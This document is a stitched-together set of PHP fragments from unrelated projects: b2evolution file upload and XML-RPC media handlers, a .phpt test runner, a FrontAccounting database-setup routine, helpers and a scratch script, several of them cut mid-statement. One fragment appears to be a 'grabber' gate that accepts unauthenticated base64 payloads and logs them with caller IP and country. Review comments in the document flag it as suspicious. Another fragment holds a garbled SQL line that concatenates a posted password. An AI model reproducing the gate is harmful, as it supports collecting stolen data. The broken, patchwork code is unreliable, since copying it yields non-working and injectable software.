out_echo($message, $specialchars); exit; } $newName = $file->getName(); $oldName = $newName; // validate file name if ($error_filename = process_filename($newName)) { // Not a file name or not an allowed extension $message['text'] = '<span class="result_error"> ' . $error_filename . '</span>'; out_echo($message, $specialchars); exit; } list($newFile, $oldFile_thumb) = check_file_exists($fm_FileRoot, $path, $newName); $newName = $newFile->get('name'); // If everything is ok, save the file somewhere if (save_to_file($file->get_content(), $newFile->get_full_path(), 'wb')) { // Change to default chmod settings $newFile->chmod(NULL); // Refreshes file properties (type, size, perms...) $newFile->load_properties(); // save file into the db $newFile->dbsave(); // Prepare the uploaded file to the final format ( E.g. Resize and Rotate images ) prepare_uploaded_files(array($newFile)); $message = ''; if (!empty($oldFile_thumb)) { $image_info = getimagesize($newFile->get_full_path()); if ($image_info) { $newFile_thumb = $newFile->get_preview_thumb('fulltype'); } else { $newFile_thumb = $newFile->get_size_formatted();
<?php
// Collector endpoint: takes a base64 payload from the POST field "logs" and,
// for module "grabbers", appends it with caller metadata to a flat text file.
// NOTE(review): no authentication, size limit or content validation is visible
// on this path, and the field, module and path names resemble a data-collection
// ("grabber") gate. If this file turns up on a host, treat it as suspicious and
// preserve logs/grabbers/ and the web server access logs as evidence.

// Remove the execution time limit for this request.
ini_set("max_execution_time", 0);
// Project helpers; get_country() and save_to_file() are not defined in this file.
require "includes/geoip.php";
require "includes/functions.php";
if (isset($_POST["logs"])) {
    $logs = trim($_POST["logs"]);
    // Spaces are mapped to '+' before decoding (presumably to undo form
    // decoding of '+' in the base64 text — confirm against the sender).
    $logs = str_replace(" ", "+", $logs);
    $logs = base64_decode($logs);
    // Loose comparison; only the "grabbers" module is handled here.
    if (isset($_POST["module"]) && $_POST["module"] == "grabbers") {
        // Metadata recorded next to the payload: peer address, looked-up country, server time.
        $ip = $_SERVER["REMOTE_ADDR"];
        $country = get_country($ip);
        $date = date("d.m.Y H:i.s");
        // The decoded payload is written verbatim after the header block.
        // NOTE(review): if logs/ is served by the web server, the collected data is
        // readable by anyone who knows the path — verify during triage.
        save_to_file("logs/grabbers/grabbers.txt", "==============================\r\n IP: {$ip}\r\n Country: {$country}\r\n Date: {$date}\r\n==============================\r\n\r\n" . $logs . "\r\n");
    }
}
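/**
 * Run one .phpt test file and report the result.
 *
 * The test is either requested over HTTP (conf TEST_WEB) or executed with the
 * configured PHP binary. Its output is compared with the EXPECT, EXPECTF,
 * EXPECTREGEX and EXPECTHEADERS sections, and the .exp/.out/.diff/.log files
 * selected by TEST_PHP_LOG_FORMAT are written on failure.
 *
 * Test sections are interpolated into a shell command line and written to
 * disk as PHP, so only trusted .phpt files should be run through this method.
 *
 * @param string $file path of the .phpt file
 * @return string 'PASSED', 'FAILED', or the skip reason when it equals 'SKIPPED'
 */
function run_test($file)
{
    if ($this->conf['TEST_PHP_DETAILED']) {
        $this->writemsg("\n=================\nTEST {$file}\n");
    }

    $section_text = $this->getSectionText($file);

    $separator = $this->iswin32 ? '\\' : '/';
    $shortname = str_replace($this->conf['TEST_BASE_PATH'] . $separator, '', $file);
    $tested = $section_text['TEST'] . " [{$shortname}]";

    // ereg_replace() was removed in PHP 7; preg_replace() with the same anchored
    // pattern derives the same companion file names.
    $phpt_re = '/\\.phpt$/';

    if ($this->conf['TEST_WEB']) {
        $tmp_file = preg_replace($phpt_re, '.' . $this->conf['TEST_WEB_EXT'], $file);
        $uri = $this->conf['TEST_BASE_SCRIPT_NAME'] . str_replace($this->conf['TEST_BASE_PATH'], '', $tmp_file);
        $uri = str_replace('\\', '/', $uri);
    } else {
        $tmp_file = preg_replace($phpt_re, '.php', $file);
    }

    // unlink old test results
    @unlink($tmp_file);
    foreach (array('.diff', '.log', '.exp', '.out') as $old_ext) {
        @unlink(preg_replace($phpt_re, $old_ext, $file));
    }

    if (!$this->conf['TEST_WEB']) {
        // Reset environment from any previous test.
        $env = $this->getENVSettings($section_text, $tmp_file);
        $ini_overwrites = $this->getINIParams($section_text);
    }

    // if this is a cgi test, prepare for it
    $query_string = '';
    $havepost = array_key_exists('POST', $section_text) && !empty($section_text['POST']);
    // allow empty query_string requests
    $haveget = array_key_exists('GET', $section_text) && !empty($section_text['GET']);
    $do_cgi = array_key_exists('CGI', $section_text) || $haveget || $havepost;

    $skipreason = $this->getSkipReason($file, $section_text, $do_cgi);
    if ($skipreason == 'SKIPPED') {
        return $skipreason;
    }

    // We've satisfied the preconditions - run the test!
    save_to_file($tmp_file, $section_text['FILE']);

    $post = NULL;
    $args = "";
    $headers = array();

    if ($this->conf['TEST_WEB']) {
        $request = $this->getEvalTestSettings(@$section_text['REQUEST'], $tmp_file);
        $headers = $this->getEvalTestSettings(@$section_text['HEADERS'], $tmp_file);

        // The unparenthesised nested ternary used here before grouped to the left
        // on PHP 5/7 (an explicit method always became 'POST') and is a parse error
        // on PHP 8; the explicit form keeps the requested method.
        if (isset($request['method'])) {
            $method = $request['method'];
        } else {
            $method = $havepost ? 'POST' : 'GET';
        }
        $query_string = $haveget ? $section_text['GET'] : '';

        $options = array();
        $options['method'] = $method;
        foreach (array('timeout', 'proxy_host', 'proxy_port', 'proxy_user', 'proxy_pass') as $opt) {
            if (isset($this->conf[$opt])) {
                $options[$opt] = $this->conf[$opt];
            }
        }

        $post = $havepost ? $section_text['POST'] : NULL;

        $url = $this->conf['TEST_SERVER_URL'];
        $url .= isset($request['SCRIPT_NAME']) ? $request['SCRIPT_NAME'] : $uri;
        if (isset($request['PATH_INFO'])) {
            $url .= $request['PATH_INFO'];
        }
        if (isset($request['FRAGMENT'])) {
            $url .= '#' . $request['FRAGMENT'];
        }
        if (isset($request['QUERY_STRING'])) {
            $query_string = $request['QUERY_STRING'];
        }
        if ($query_string) {
            $url .= '?' . $query_string;
        }
        if ($this->conf['TEST_PHP_DETAILED']) {
            $this->writemsg("\nURL = {$url}\n");
        }
    } else {
        if ($do_cgi) {
            $query_string = $haveget ? $section_text['GET'] : '';

            // Each default is applied only when the test did not set that same key.
            // SERVER_NAME and QUERY_STRING used to be guarded by the wrong key, so
            // SERVER_NAME was never set and QUERY_STRING depended on SERVER_NAME.
            $env_defaults = array(
                'GATEWAY_INTERFACE' => 'CGI/1.1',
                'SERVER_SOFTWARE' => 'PHP Test Harness',
                'SERVER_NAME' => '127.0.0.1',
                'REDIRECT_STATUS' => '200',
                'QUERY_STRING' => $query_string,
            );
            foreach ($env_defaults as $env_key => $env_value) {
                if (!array_key_exists($env_key, $env)) {
                    $env[$env_key] = $env_value;
                }
            }

            if (!array_key_exists('PATH_TRANSLATED', $env) && !array_key_exists('SCRIPT_FILENAME', $env)) {
                $env['PATH_TRANSLATED'] = $tmp_file;
                $env['SCRIPT_FILENAME'] = $tmp_file;
            }
            foreach (array('PATH_TRANSLATED', 'PATH_INFO', 'SCRIPT_NAME', 'SCRIPT_FILENAME') as $env_key) {
                if (!array_key_exists($env_key, $env)) {
                    $env[$env_key] = '';
                }
            }

            if (array_key_exists('POST', $section_text) && (!$haveget || !empty($section_text['POST']))) {
                $post = $section_text['POST'];
                $request_defaults = array(
                    'REQUEST_METHOD' => 'POST',
                    'CONTENT_TYPE' => 'application/x-www-form-urlencoded',
                    'CONTENT_LENGTH' => strlen($post),
                );
            } else {
                $request_defaults = array(
                    'REQUEST_METHOD' => 'GET',
                    'CONTENT_TYPE' => '',
                    'CONTENT_LENGTH' => '',
                );
            }
            foreach ($request_defaults as $env_key => $env_value) {
                if (!array_key_exists($env_key, $env)) {
                    $env[$env_key] = $env_value;
                }
            }

            if ($this->conf['TEST_PHP_DETAILED'] > 1) {
                $this->writemsg("\nCONTENT_LENGTH = " . $env['CONTENT_LENGTH']
                    . "\nCONTENT_TYPE = " . $env['CONTENT_TYPE']
                    . "\nPATH_TRANSLATED = " . $env['PATH_TRANSLATED']
                    . "\nPATH_INFO = " . $env['PATH_INFO']
                    . "\nQUERY_STRING = " . $env['QUERY_STRING']
                    . "\nREDIRECT_STATUS = " . $env['REDIRECT_STATUS']
                    . "\nREQUEST_METHOD = " . $env['REQUEST_METHOD']
                    . "\nSCRIPT_NAME = " . $env['SCRIPT_NAME']
                    . "\nSCRIPT_FILENAME = " . $env['SCRIPT_FILENAME'] . "\n");
            }

            /* not cgi spec to put query string on command line,
               but used by a couple tests to catch a security hole
               in older php versions. At least IIS can be configured
               to do this. */
            // The query string is deliberately passed through unescaped for those
            // tests, so the command line is only as trustworthy as the .phpt file.
            $args = $env['QUERY_STRING'];
            $args = "{$ini_overwrites} {$tmp_file} \"{$args}\" 2>&1";
        } else {
            $args = !empty($section_text['ARGS']) ? $section_text['ARGS'] : '';
            $args = "{$ini_overwrites} {$tmp_file} {$args} 2>&1";
        }
    }

    if ($this->conf['TEST_WEB']) {
        // we want headers also, so fopen
        $r = new HTTPRequest($url, $headers, $options, $post);
        $out = $r->response;
        $headers = $r->response_headers;
    } else {
        $out = execute($this->conf['TEST_PHP_EXECUTABLE'], $args, $post, $this->cwd, $env);
        // if this is a cgi, remove the headers first
        if ($this->test_executable_iscgi && preg_match("/^(.*?)\r?\n\r?\n(.*)/s", $out, $match)) {
            $out = $match[2];
            $rh = preg_split("/[\n\r]+/", $match[1]);
            $headers = array();
            foreach ($rh as $line) {
                if (strpos($line, ':') !== false) {
                    $line = explode(":", $line, 2);
                    $headers[trim($line[0])] = trim($line[1]);
                }
            }
        }
    }

    if ($this->conf['TEST_PHP_DETAILED'] > 2) {
        echo "HEADERS: ";
        print_r($headers);
        echo "OUTPUT: \n{$out}\n";
    }

    // Does the output match what is expected?
    $output = trim($out);
    $output = preg_replace('/\\r\\n/', "\n", $output);

    $failed = FALSE;
    // Defined up front so the failure report below never reads an unset variable
    // when a test has no EXPECT* section at all.
    $wanted = '';

    if (isset($section_text['EXPECTF']) || isset($section_text['EXPECTREGEX'])) {
        if (isset($section_text['EXPECTF'])) {
            $wanted = $section_text['EXPECTF'];
        } else {
            $wanted = $section_text['EXPECTREGEX'];
        }
        $wanted_re = preg_replace('/\\r\\n/', "\n", $wanted);
        if (isset($section_text['EXPECTF'])) {
            $wanted_re = preg_quote($wanted_re, '/');
            // Stick to basics
            $wanted_re = str_replace("%s", ".+?", $wanted_re); //not greedy
            $wanted_re = str_replace("%i", "[+\\-]?[0-9]+", $wanted_re);
            $wanted_re = str_replace("%d", "[0-9]+", $wanted_re);
            $wanted_re = str_replace("%x", "[0-9a-fA-F]+", $wanted_re);
            // %f allows two points "-.0.0" but that is the best *simple* expression
            $wanted_re = str_replace("%f", "[+\\-]?\\.?[0-9]+\\.?[0-9]*(E-?[0-9]+)?", $wanted_re);
            $wanted_re = str_replace("%c", ".", $wanted_re);
        }
        $failed = !preg_match("/^{$wanted_re}\$/s", $output);
    }

    $skipexpect = false;
    if (!$failed && $this->conf['TEST_WEB'] && isset($section_text['EXPECTHEADERS'])) {
        $want = array();
        $lines = preg_split("/[\n\r]+/", $section_text['EXPECTHEADERS']);
        $wanted = '';
        foreach ($lines as $line) {
            if (strpos($line, ':') !== false) {
                $line = explode(":", $line, 2);
                $want[trim($line[0])] = trim($line[1]);
                $wanted .= trim($line[0]) . ': ' . trim($line[1]) . "\n";
            }
        }
        $output = '';
        foreach ($want as $k => $v) {
            // A header the server did not send is reported as empty and fails the test.
            $received = isset($headers[$k]) ? $headers[$k] : '';
            $output .= "{$k}: {$received}\n";
            if (!isset($headers[$k]) || $headers[$k] != $v) {
                $failed = TRUE;
            }
        }

        // different servers may do different things on non-200 results
        // for instance, IIS will deliver it's own error pages, so we
        // cannot expect to match up the EXPECT section.  We may however,
        // want to match EXPECT on more than 200 results, so this may
        // need to change later.
        $skipexpect = isset($headers['Status']) && $headers['Status'] != 200;
    }

    if (!$failed && !$skipexpect && isset($section_text['EXPECT'])) {
        $wanted = $section_text['EXPECT'];
        $wanted = preg_replace('/\\r\\n/', "\n", $wanted);
        $failed = 0 != strcmp($output, $wanted);
    }

    if (!$failed) {
        @unlink($tmp_file);
        $this->showstatus($tested, 'PASSED');
        return 'PASSED';
    }

    // Test failed so we need to report details.
    $this->showstatus($tested, 'FAILED');

    $this->failed_tests[] = array(
        'name' => $file,
        'test_name' => $tested,
        'output' => preg_replace($phpt_re, '.log', $file),
        'diff' => preg_replace($phpt_re, '.diff', $file),
    );

    if ($this->conf['TEST_PHP_DETAILED']) {
        $this->writemsg(generate_diff($wanted, $output) . "\n");
    }

    $log_format = $this->conf['TEST_PHP_LOG_FORMAT'];

    // write .exp
    if (strpos($log_format, 'E') !== FALSE) {
        $logname = preg_replace($phpt_re, '.exp', $file);
        save_to_file($logname, $wanted);
    }

    // write .out
    if (strpos($log_format, 'O') !== FALSE) {
        $logname = preg_replace($phpt_re, '.out', $file);
        save_to_file($logname, $output);
    }

    // write .diff
    if (strpos($log_format, 'D') !== FALSE) {
        $logname = preg_replace($phpt_re, '.diff', $file);
        save_to_file($logname, generate_diff($wanted, $output));
    }

    // write .log
    if (strpos($log_format, 'L') !== FALSE) {
        $logname = preg_replace($phpt_re, '.log', $file);
        save_to_file($logname, "\n---- EXPECTED OUTPUT\n{$wanted}\n" . "---- ACTUAL OUTPUT\n{$output}\n" . "---- FAILED\n");
        // display emacs/msvc error output
        if (strpos($log_format, 'C') !== FALSE) {
            $this->error_report($file, $logname, $tested);
        }
    }

    return 'FAILED';
}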
// Validate URL and parse it for the file name if (!is_absolute_url($url) || !($parsed_url = parse_url($url)) || empty($parsed_url['scheme']) || empty($parsed_url['host']) || empty($parsed_url['path']) || $parsed_url['path'] == '/') { // Includes forbidding getting the root of a server $failedFiles[$k] = T_('The URL must start with <code>http://</code> or <code>https://</code> and point to a valid file!'); continue; } $file_contents = fetch_remote_page($url, $info, NULL, $Settings->get('upload_maxkb')); if ($file_contents !== false) { // Create temporary file and insert contents into it. $tmpfile_name = tempnam(sys_get_temp_dir(), 'fmupload'); if (!$tmpfile_name) { $failedFiles[$k] = 'Failed to find temporary directory.'; // no trans: very unlikely continue; } if (!save_to_file($file_contents, $tmpfile_name, 'w')) { unlink($tmpfile_name); $failedFiles[$k] = sprintf('Could not write to temporary file (%s).', $tmpfile_name); continue; } // Fake/inject info into PHP's array of uploaded files. // fp> TODO! This is a nasty dirty hack. That kind of stuff always breaks somewhere down the line. Needs cleanup. // This allows us to treat it (nearly) the same way as regular uploads, apart from // is_uploaded_file(), which we skip and move_uploaded_file() (where we use rename()). $_FILES['uploadfile']['name'][$k] = rawurldecode(basename($parsed_url['path'])); $_FILES['uploadfile']['size'][$k] = evo_bytes($file_contents); $_FILES['uploadfile']['error'][$k] = 0; $_FILES['uploadfile']['tmp_name'][$k] = $tmpfile_name; $_FILES['uploadfile']['_evo_fetched_url'][$k] = $url; // skip is_uploaded_file and keep info unset($file_contents);
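/**
 * metaWeblog.newMediaObject image upload
 * wp.uploadFile
 *
 * Supplied image is encoded into the struct as bits
 *
 * The caller is authenticated, must hold the 'files'/'add' permission on the
 * blog, and the upload must pass the size, file name and directory name checks
 * before anything is moved into the file root. The temporary file is removed
 * on every failure path after it has been created.
 *
 * @see http://www.xmlrpc.com/metaWeblogApi#metaweblognewmediaobject
 * @see http://codex.wordpress.org/XML-RPC_wp#wp.uploadFile
 *
 * @param xmlrpcmsg XML-RPC Message
 *					0 blogid (string): Unique identifier of the blog the post will be added to.
 *						Currently ignored in b2evo, in favor of the category.
 *					1 username (string): Login for a Blogger user who has permission to edit the given
 *						post (either the user who originally created it or an admin of the blog).
 *					2 password (string): Password for said username.
 *					3 struct (struct)
 *						- name : filename
 *						- type : mimetype
 *						- bits : base64 encoded file
 * @return xmlrpcresp XML-RPC Response
 */
function _wp_mw_newmediaobject($m)
{
    global $Settings, $Plugins, $force_upload_forbiddenext;

    // CHECK LOGIN:
    /**
     * @var User
     */
    if (!($current_User =& xmlrpcs_login($m, 1, 2))) {
        // Login failed, return (last) error:
        return xmlrpcs_resperror();
    }

    // GET BLOG:
    /**
     * @var Blog
     */
    if (!($Blog =& xmlrpcs_get_Blog($m, 0))) {
        // Blog not found, return (last) error:
        return xmlrpcs_resperror();
    }

    // CHECK PERMISSION:
    if (!$current_User->check_perm('files', 'add', false, $Blog->ID)) {
        // Permission denied
        return xmlrpcs_resperror(3); // User error 3
    }
    logIO('Permission granted.');

    if (!$Settings->get('upload_enabled')) {
        return xmlrpcs_resperror(2, 'Object upload not allowed');
    }

    $xcontent = $m->getParam(3);
    // Get the main data - and decode it properly for the image - sorry, binary object
    logIO('Decoding content...');
    $contentstruct = xmlrpc_decode_recurse($xcontent);
    $data = $contentstruct['bits'];

    // The client-supplied type is only a hint; for images it is replaced below
    // by what getimagesize() detects in the content.
    $file_mimetype = isset($contentstruct['type']) ? $contentstruct['type'] : '(none)';
    logIO('Received MIME type: ' . $file_mimetype);

    $overwrite = isset($contentstruct['overwrite']) ? (bool) $contentstruct['overwrite'] : false;
    logIO('Overwrite if exists: ' . ($overwrite ? 'yes' : 'no'));

    load_funcs('files/model/_file.funcs.php');

    $filesize = evo_bytes($data);
    if (($maxfilesize = $Settings->get('upload_maxkb') * 1024) && $filesize > $maxfilesize) {
        return xmlrpcs_resperror(4, sprintf(T_('The file is too large: %s but the maximum allowed is %s.'), bytesreadable($filesize, false), bytesreadable($maxfilesize, false)));
    }
    logIO('File size is OK: ' . bytesreadable($filesize, false));

    $FileRootCache =& get_FileRootCache();
    $fm_FileRoot =& $FileRootCache->get_by_type_and_ID('collection', $Blog->ID, true);
    if (!$fm_FileRoot) {
        // fileRoot not found:
        return xmlrpcs_resperror(14, 'File root not found');
    }

    $rf_filepath = $contentstruct['name'];
    logIO('Received filepath: ' . $rf_filepath);

    // Split into path + name:
    $filepath_parts = explode('/', $rf_filepath);
    $filename = array_pop($filepath_parts);
    logIO('Original file name: ' . $filename);

    // Validate and sanitize filename
    if ($error_filename = process_filename($filename, true)) {
        return xmlrpcs_resperror(5, $error_filename);
    }
    logIO('Sanitized file name: ' . $filename);

    // Check valid path parts:
    // NOTE(review): rejecting '..' and other traversal components is left to
    // validate_dirname(), which is not visible here — confirm it does.
    $rds_subpath = '';
    foreach ($filepath_parts as $filepath_part) {
        if (empty($filepath_part) || $filepath_part == '.') {
            // self ref not useful
            continue;
        }
        if ($error = validate_dirname($filepath_part)) {
            // invalid relative path:
            logIO($error);
            return xmlrpcs_resperror(6, $error);
        }
        $rds_subpath .= $filepath_part . '/';
    }
    logIO('Subpath: ' . $rds_subpath);

    // Create temporary file and insert contents into it.
    $tmpfile_name = tempnam(sys_get_temp_dir(), 'fmupload');
    if (!$tmpfile_name) {
        // Without a temp file there is nothing to move later, so stop here
        // instead of failing at rename() with a misleading message.
        return xmlrpcs_resperror(13, 'Error while writing to temp file.');
    }
    if (!save_to_file($data, $tmpfile_name, 'wb')) {
        @unlink($tmpfile_name);
        return xmlrpcs_resperror(13, 'Error while writing to temp file.');
    }
    $image_info = @getimagesize($tmpfile_name);

    if (!empty($image_info)) {
        // This is an image file, let's check mimetype and correct extension
        // getimagesize() inspects the image header only, so a valid header does
        // not prove the rest of the file is harmless.
        if ($image_info['mime'] != $file_mimetype) {
            // Invalid file type
            $FiletypeCache =& get_FiletypeCache();
            // Get correct file type based on mime type
            $correct_Filetype = $FiletypeCache->get_by_mimetype($image_info['mime'], false, false);
            $file_mimetype = $image_info['mime'];

            // Check if file type is known by us, and if it is allowed for upload.
            // If we don't know this file type or if it isn't allowed we don't change the extension! The current extension is allowed for sure.
            if ($correct_Filetype && $correct_Filetype->is_allowed()) {
                // A FileType with the given mime type exists in database and it is an allowed file type for current User
                // The "correct" extension is a plausible one, proceed...
                // array_shift() takes its argument by reference, so it needs a variable.
                $known_extensions = $correct_Filetype->get_extensions();
                $correct_extension = array_shift($known_extensions);
                $path_info = pathinfo($filename);
                $current_extension = isset($path_info['extension']) ? $path_info['extension'] : '';

                // change file extension to the correct extension, but only if the correct extension is not restricted, this is an extra security check!
                // The forbidden list is checked with the extension as stored and lowercased.
                if (!empty($correct_extension)
                    && strtolower($current_extension) != strtolower($correct_extension)
                    && !in_array($correct_extension, $force_upload_forbiddenext)
                    && !in_array(strtolower($correct_extension), $force_upload_forbiddenext)) {
                    // change the file extension to the correct extension
                    $filename = $path_info['filename'] . '.' . $correct_extension;
                }
            }
        }
    }

    // Get File object for requested target location:
    $FileCache =& get_FileCache();
    $newFile =& $FileCache->get_by_root_and_path($fm_FileRoot->type, $fm_FileRoot->in_type_ID, trailing_slash($rds_subpath) . $filename, true);

    if ($newFile->exists()) {
        if ($overwrite && $newFile->unlink()) {
            // OK, file deleted
            // Delete thumb caches from old location:
            logIO('Old file deleted');
            $newFile->rm_cache();
        } else {
            @unlink($tmpfile_name);
            return xmlrpcs_resperror(8, sprintf(T_('The file «%s» already exists.'), $filename));
        }
    }

    // Trigger plugin event
    if ($Plugins->trigger_event_first_false('AfterFileUpload', array(
            'File' => &$newFile,
            'name' => &$filename,
            'type' => &$file_mimetype,
            'tmp_name' => &$tmpfile_name,
            'size' => &$filesize,
        ))) {
        // Plugin returned 'false'.
        // Abort upload for this file:
        @unlink($tmpfile_name);
        return xmlrpcs_resperror(16, 'File upload aborted by a plugin.');
    }

    if (!mkdir_r($newFile->get_dir())) {
        // Dir didn't already exist and could not be created
        @unlink($tmpfile_name);
        return xmlrpcs_resperror(9, 'Error creating sub directories: ' . $newFile->get_rdfs_rel_path());
    }

    if (!@rename($tmpfile_name, $newFile->get_full_path())) {
        @unlink($tmpfile_name);
        return xmlrpcs_resperror(13, 'Error while writing to file.');
    }

    // chmod the file
    $newFile->chmod();

    // Initializes file properties (type, size, perms...)
    $newFile->load_properties();

    // Load meta data AND MAKE SURE IT IS CREATED IN DB:
    // NOTE(review): a statement `$newFile->meta == 'unknown';` used to sit here; it
    // is a comparison with no effect. If resetting meta before load_meta() was the
    // intent it needs an assignment — confirm against File::load_meta().
    $newFile->load_meta(true);

    // Resize and rotate
    logIO('Running file post-processing (resize and rotate)...');
    prepare_uploaded_files(array($newFile));
    logIO('Done');

    $url = $newFile->get_url();
    logIO('URL of new file: ' . $url);

    $struct = new xmlrpcval(array(
        'file' => new xmlrpcval($filename, 'string'),
        'url' => new xmlrpcval($url, 'string'),
        'type' => new xmlrpcval($file_mimetype, 'string'),
    ), 'struct');

    logIO('OK.');
    return new xmlrpcresp($struct);
}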
/**
 * Store the submitted company/database connection and, when requested, create
 * the database and import the uploaded SQL script into it.
 *
 * Reads $_GET['id'], $_GET['ul'], $_POST and $_FILES['uploadfile'] directly and
 * updates the global connection table before writing it with write_config_db().
 *
 * @return bool true on success, false when validation, database creation, the
 *              upload or the configuration write fails
 */
function handle_submit() {
    global $db_connections, $def_coy, $tb_pref_counter, $db, $comp_path, $comp_subdirs;
    // $new is never set to true in this function, so the directory set-up at the
    // end does not run as written.
    $new = false;
    if (!check_data()) {
        return false;
    }
    // NOTE(review): the id comes from the query string and is used as an array key
    // and, further down, as a directory name; no validation is visible here —
    // confirm that check_data() constrains it.
    $id = $_GET['id'];
    // Connection settings, including the database password, are taken as posted.
    $db_connections[$id]['name'] = $_POST['name'];
    $db_connections[$id]['host'] = $_POST['host'];
    $db_connections[$id]['dbuser'] = $_POST['dbuser'];
    $db_connections[$id]['dbpassword'] = $_POST['dbpassword'];
    $db_connections[$id]['dbname'] = $_POST['dbname'];
    if ((bool) $_POST['def'] == true) {
        $def_coy = $id;
    }
    // ul=1: create the database and load the uploaded script into it.
    if (isset($_GET['ul']) && $_GET['ul'] == 1) {
        $conn = $db_connections[$id];
        if (($db = db_create_db($conn)) == 0) {
            display_error(tr("Error creating Database: ") . $conn['dbname'] . tr(", Please create it manually"));
            remove_connection($id);
            set_global_connection();
            return false;
        }
        $filename = $_FILES['uploadfile']['tmp_name'];
        // is_uploaded_file() ensures the path really is this request's upload.
        if (is_uploaded_file($filename)) {
            db_import($filename, $conn, $id);
            if (isset($_POST['admpassword']) && $_POST['admpassword'] != "") {
                // NOTE(review): the next statement is garbled in this copy (part of the
                // expression appears to have been masked) and does not parse as shown.
                // It builds SQL by string concatenation from a posted value; whatever
                // the original expression was, the value should be bound as a parameter
                // or escaped for the database, and the password stored with
                // password_hash() rather than a fast hash.
                db_query("UPDATE users set password = '******'admpassword']) . "' WHERE user_id = 'admin'");
            }
        } else {
            display_error(tr("Error uploading Database Script, please upload it manually"));
            set_global_connection();
            return false;
        }
        set_global_connection();
    }
    // Persist the connection table; negative codes are reported below.
    $error = write_config_db($new);
    // NOTE(review): $path_to_root is not in this function's global list, so it is
    // undefined in the messages below unless declared elsewhere — confirm.
    if ($error == -1) {
        display_error(tr("Cannot open the configuration file - ") . $path_to_root . "/config_db.php");
    } else {
        if ($error == -2) {
            display_error(tr("Cannot write to the configuration file - ") . $path_to_root . "/config_db.php");
        } else {
            if ($error == -3) {
                display_error(tr("The configuration file ") . $path_to_root . "/config_db.php" . tr(" is not writable. Change its permissions so it is, then re-run the operation."));
            }
        }
    }
    if ($error != 0) {
        return false;
    }
    // Placeholder index.php that redirects away, so the company directories
    // cannot be browsed directly.
    $index = "<?php\nheader(\"Location: ../../index.php\");\n?>";
    if ($new) {
        $cdir = $comp_path . '/' . $id;
        // mkdir failures are suppressed; save_to_file() results are not checked.
        @mkdir($cdir);
        save_to_file($cdir . '/' . 'index.php', 0, $index);
        foreach ($comp_subdirs as $dir) {
            @mkdir($cdir . '/' . $dir);
            save_to_file($cdir . '/' . $dir . '/' . 'index.php', 0, $index);
        }
    }
    return true;
}
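/**
 * Prepare maintenance directory
 *
 * Creates the directory when it is missing and, when $deny_access is set, adds
 * an .htaccess that denies all web access plus an empty index.html as a
 * fallback against directory listing. Progress is echoed as HTML.
 *
 * @param string directory path, with or without a trailing slash
 * @param boolean create .htaccess file that denies all access
 * @return boolean true on success, false when the directory or the .htaccess
 *                 file could not be created
 */
function prepare_maintenance_dir($dir_name, $deny_access = true)
{
    // File names below are appended to the path, so it must end with a separator;
    // without one the files would land next to the directory instead of inside it.
    $last_char = substr($dir_name, -1);
    if ($dir_name === '' || $last_char === '/' || $last_char === '\\') {
        $dir_path = $dir_name;
    } else {
        $dir_path = $dir_name . '/';
    }

    if (!file_exists($dir_name)) {
        // We can create directory
        if (!mkdir_r($dir_name)) {
            echo '<p style="color:red">' . sprintf(T_('Unable to create «%s» directory.'), htmlspecialchars($dir_name)) . '</p>';
            evo_flush();
            return false;
        }
    }

    if ($deny_access) {
        // Create .htaccess file
        echo '<p>' . T_('Checking .htaccess denial for directory: ') . htmlspecialchars($dir_name);
        evo_flush();

        $htaccess_name = $dir_path . '.htaccess';
        if (!file_exists($htaccess_name)) {
            // We can create .htaccess file
            // "Deny from all" is the Apache 2.2 form; Apache 2.4 uses "Require all denied",
            // so both are written and the server picks the one it understands.
            $htaccess_rules = "<IfModule mod_authz_core.c>\n"
                . "\tRequire all denied\n"
                . "</IfModule>\n"
                . "<IfModule !mod_authz_core.c>\n"
                . "\tDeny from all\n"
                . "</IfModule>\n";
            if (!save_to_file($htaccess_rules, $htaccess_name, 'w')) {
                echo '</p><p style="color:red">' . sprintf(T_('Unable to create «%s» file in directory.'), htmlspecialchars($htaccess_name)) . '</p>';
                evo_flush();
                return false;
            }
        }

        // Create index.html to disable directory browsing. Checked on its own so it is
        // also added to a directory that already has an .htaccess. Best effort only:
        // .htaccess has no effect on servers other than Apache.
        if (!file_exists($dir_path . 'index.html')) {
            save_to_file('', $dir_path . 'index.html', 'w');
        }

        echo ' : OK.</p>';
        evo_flush();
        // fp> TODO: make sure "deny all" actually works by trying to request the directory through HTTP
    }

    return true;
}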
/**
 * Generate .POT file
 *
 * Collects the strings found by translation_scandir() under $basepath and
 * writes them, with their source file references, to messages.pot in
 * $locales_path.
 *
 * @return boolean result of save_to_file() cast to boolean
 */
function translation_generate_pot_file()
{
    global $DB, $locales_path;
    global $basepath;

    $pot_file_name = $locales_path . 'messages.pot';

    // File header
    $pot_content = array(
        '# b2evolution - Language file',
        '# Copyright (C) ' . date('Y') . ' Francois PLANQUE',
        '# This file is distributed under the same license as the b2evolution package.',
        '',
    );

    $translation_strings = array();
    translation_scandir($basepath, $translation_strings);

    // One entry per string: its source references, the msgid, an empty msgstr and a blank line.
    // NOTE(review): the string is placed between double quotes as is; this assumes
    // translation_scandir() returns it already escaped for a .POT file — confirm.
    foreach ($translation_strings as $string => $files) {
        foreach ($files as $file) {
            $pot_content[] = '#: ' . $file;
        }
        array_push($pot_content, 'msgid "' . $string . '"', 'msgstr ""', '');
    }

    // Write to .POT file
    return (bool) save_to_file(implode("\r\n", $pot_content), $pot_file_name, 'w+');
}
* @authors Your Name (you@example.org) * @date 2016-02-18 12:02:31 * @version $Id$ */ $data = $_POST["data"]; // echo "hello world"; // $filename=dirname(__FILE__); chdir('/www/sgh'); // $imgname="aaa".".png"; $img_path1 = '/www/sgh/html/aaa.txt'; // $img_path2='/html/images/'.$imgname; // function convert_data($data){ // $image=base64_decode($data); // save_to_file($image); // } function save_to_file() { echo "hello world"; echo filesize($img_path1); $fp = fopen('/www/sgh/html/aaa.txt', "r"); $return_data = fread($fp, filesize($img_path1)); // echo $return_data; fclose($fp); echo $return_data; // $arr=array('data'=>$return_data); // exit(json_decode($arr)); } save_to_file(); // convert_data($data); // $arr=array("url"=>$img_path2); // exit(json_encode($arr));
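$block_item_Widget->disp_template_replaced('block_start');

// Both values come from the request: one decides where the package is fetched
// from, the other becomes part of a path on disk.
$download_url = param('upd_url', 'string');
$upgrade_name = param('upd_name', 'string', '', true);
$upgrade_file = $upgrade_path . $upgrade_name . '.zip';

// The name must be a plain file name: no directory separators, no parent
// references, no NUL byte.
$upgrade_name_ok = $upgrade_name === basename($upgrade_name)
    && strpos($upgrade_name, '..') === false
    && strpos($upgrade_name, '\\') === false
    && strpos($upgrade_name, "\0") === false;

// Only absolute http(s) URLs with a host are fetched.
$url_parts = parse_url($download_url);
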